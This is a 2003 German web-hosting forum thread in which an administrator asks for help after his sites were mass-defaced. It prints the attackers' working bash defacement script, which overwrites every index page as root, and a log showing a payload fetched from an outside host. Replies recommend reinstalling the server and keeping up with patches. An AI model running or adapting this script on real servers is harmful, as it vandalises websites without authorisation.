HAcker Bitte um Hilfe

Lesenswerte Artikel, Anleitungen und Diskussionen
zero
Posts: 99
Joined: 2002-09-13 08:17
Location: Koblenz

HAcker Bitte um Hilfe

Post by zero » 2003-11-05 18:09

Sorry hab erst in Scripting gepostet mein Fehler zu spät gesehen.


Auf allen Seiten die auf dem Server liegen hab ich diese NAchricht:

Perfect.BR TEAM perfectbr@mail.com

Habe den FTP geprüft. Es wurde von allen index Daten ein Backup gemacht jedoch wnen ich sie wiederherstelle ist die File direkt wieder da. Scheinbar ein SSL Bug. Kennt das jamand un kann mir helfen ?

Habe eigentlich immer alles eingespielt !

Irgendwie hat er dieser URL ausgeführt es scheint ein Wurm zu sein Norton erkennt die File so wenn ich sie versuche zu laden:

http://www.fdlsk8.hpg.com.br/sslpbr ( Link nicht auf Linux ausführen )



Auszug aus dem Error.log Apache:

Code: Select all

[Wed Nov  5 17:02:19 2003] [error] [client 12.148.209.196] File does not exist: /home/www/web30/html/robots.txt
--17:27:24--  http://www.uias.hpg.ig.com.br/utils/cbd
           => `cbd'
Connecting to www.uias.hpg.ig.com.br:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 15,003 [text/plain]

    0K -> .......... ....                                        [100%]

17:27:30 (30.33 KB/s) - `cbd' saved [15003/15003]

--17:30:25--  http://www.uias.hpg.ig.com.br/utils/cbd
           => `cbd.1'
Connecting to www.uias.hpg.ig.com.br:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 15,003 [text/plain]

    0K -> .......... ....                                        [100%]

17:30:26 (30.52 KB/s) - `cbd.1' saved [15003/15003]

Was sollte ich nun tun ?

Jemand eine Idee ?

Bitte um Hilfe



Das hier habe ich gefunden:

Code: Select all

#!/bin/bash
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#                                                       ##
#  Perfect.BR - e-mail: perfectbr@mail.com              ##
#                                                       ##
##########################################################

# # # Quem Somos:      # # # # # # # # # # # # # # # # ###
#         Sl4yD :: Wroger :: Gui_ :: Merfolk            ##
##########################################################

procura_paginas () {
        find $DIR_LOG -name *index* >.logs
#find $DIR_LOG -name *wtmp* >>.logs
        LINHA=`wc .logs |cut -c-7`
}
console () {
#echo -n "[S] Killando qualquer especie de monitoramento..."
#killall -9 tail 1>/dev/null 2>/dev/null;echo "ok"
        echo -n "==> Aguarde, procurando paginas.."
        procura_paginas;
        echo "encontrados $LINHA Paginas para Ownar"
        sleep 5
        echo -n "--> Colocando seu texto nas Paginas"
        for log in `cat .logs`
        do
                echo -n " -> in $log..."

                cp $log $log.bak
                echo $MY_TEXT >$log
                echo "ok"
        done
        echo ":-)  Perfect.BR ownou vc."
        echo "ok"
        echo "((((( Agora é soh registra! )))))"
}
help () {
        echo "    Use:  $0  <seu_texto>"
        echo "Exemplo:  $0  'Owned Perfect.BR'"
}

if [ `whoami` != "root" ]; then
        echo "[S] Execute somente como root"
        exit
fi

if [ "$2" = "" ]; then
        DIR_LOG="./"
else
        DIR_LOG=$2
fi
echo; echo ; echo "<<<<<<<<<   Perfect.BR Devastador de Server   >>>>>>>>>>"
echo              "         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
echo              "               www.perfectbr.kit.net          "
echo "e-mail: perfectbr@mail.com irc.brasnet.org #perfect_br"
echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
if [ "$1" = "" ]; then
        help;
else
        MY_TEXT="$1"
        console;
fi


Es muss irgendwo am Apache liegen denn ich kann ändern was ich will gibt es beim Apache eine Art Stadard seite die immer kommt ?

cybton
Posts: 71
Joined: 2003-05-11 15:15

Re: HAcker Bitte um Hilfe

Post by cybton » 2003-11-05 19:20

Hallo!

Also du hast nun einen Wurm am Server (falls du das noch nicht weißt).

Ich würd mal die Dienste (wenn du glaubst der Apache ist es), abschalten, das sonst nichts passieren kann.
Ich denke mal der wird sich wo abgesetzt haben. Hast du einen Antivirus für Linux?

zero
Posts: 99
Joined: 2002-09-13 08:17
Location: Koblenz

Re: HAcker Bitte um Hilfe

Post by zero » 2003-11-05 20:03

Ja AntiVir wurm ist nicht drauf der Hacker hat nur das Script oben abgesetzt er hat sich in eine .log datei alle *index* Daten geschrieben und auf alle ein mv abgesetzt so wie ich das sehen kann


In meinen webX Ordner haben nun alle index.* den Text mit der E-Mail Adresse. Jedoch wurde von jeder eine index.*.back angelegt jedoch wenn ich diese umbenne pasiert nichts weiter die daten kommen zurück. Nur wenn ich das BAckup einspiele Testweise bei einem WEB gemacht.

Kommt die Seite wieder es muss also irgendwie noch eine andere Startseite geben.. wie könnte ich da ran kommen = ?

captaincrunch
Userprojekt
Userprojekt
Posts: 7225
Joined: 2002-10-09 14:30
Location: Dorsten

Re: HAcker Bitte um Hilfe

Post by captaincrunch » 2003-11-05 20:11

Also du hast nun einen Wurm am Server (falls du das noch nicht weißt).
Aha !?! Das erkennst du anhand des Shellscripts (das noch nicht einmal sher "intelligent" geschieben ist) ?
Eine Sicherheitslücke hast du definitiv, aber von einem Wurm sehe ich da nichts, das was ich sehe ich eher ein Mass-Defacement.

Trotz allem : Reinitialisierung veranlassen. Vosicht ist besser als Nachsicht.
DebianHowTo
echo "[q]sa[ln0=aln256%Pln256/snlbx]sb729901041524823122snlbxq"|dc

zero
Posts: 99
Joined: 2002-09-13 08:17
Location: Koblenz

Re: HAcker Bitte um Hilfe

Post by zero » 2003-11-05 20:54

Ok eine Frage habe ich noch kann ich mit chown die Rechte rekusiv vergeben also auch den Benutzer und Gruppe dür die Unterverzeichnisse gültig setzten.

chris76
Moderator
Moderator
Posts: 2015
Joined: 2003-06-27 14:37
Location: Germering

Re: HAcker Bitte um Hilfe

Post by chris76 » 2003-11-05 21:02

ja kannst du

Code: Select all

-R

User avatar
Joe User
Project Manager
Project Manager
Posts: 11578
Joined: 2003-02-27 01:00
Location: Hamburg

Re: HAcker Bitte um Hilfe

Post by Joe User » 2003-11-05 21:14

Zero wrote:Ok eine Frage habe ich noch kann ich mit chown die Rechte rekusiv vergeben also auch den Benutzer und Gruppe dür die Unterverzeichnisse gültig setzten.
Ja, kannst Du, stellt sich nur die Frage, weshalb Du das ausgerechnet jetzt und in diesem Thread fragst? Egal was Du vorhast, lass es! Lass die Kiste neu aufsetzen, führe regelmässiger Securityupdates durch und lass die Finger von Dingen, welche Du nicht mindestens zu 95% verstanden hast...

zero
Posts: 99
Joined: 2002-09-13 08:17
Location: Koblenz

Re: HAcker Bitte um Hilfe

Post by zero » 2003-11-05 21:40

Ja du hast du recht.. ist wahrscheinlich wirklich besser so. Danke für die Hilfe.

olafover
Posts: 17
Joined: 2003-06-09 04:52

Nützliches Script

Post by olafover » 2003-12-05 19:27

Hm -. also all zu schön isses ja nicht dieses Script ...
aber irgendwie vieleicht doch auch praktisch : Wenn man den Text ändert - so könnte man zum Beispiel jede Seite mit einer Dauerwerbung versehen, oder nem Copyright - ich probiers mal - steh eh kurz vor nem Re-Init ...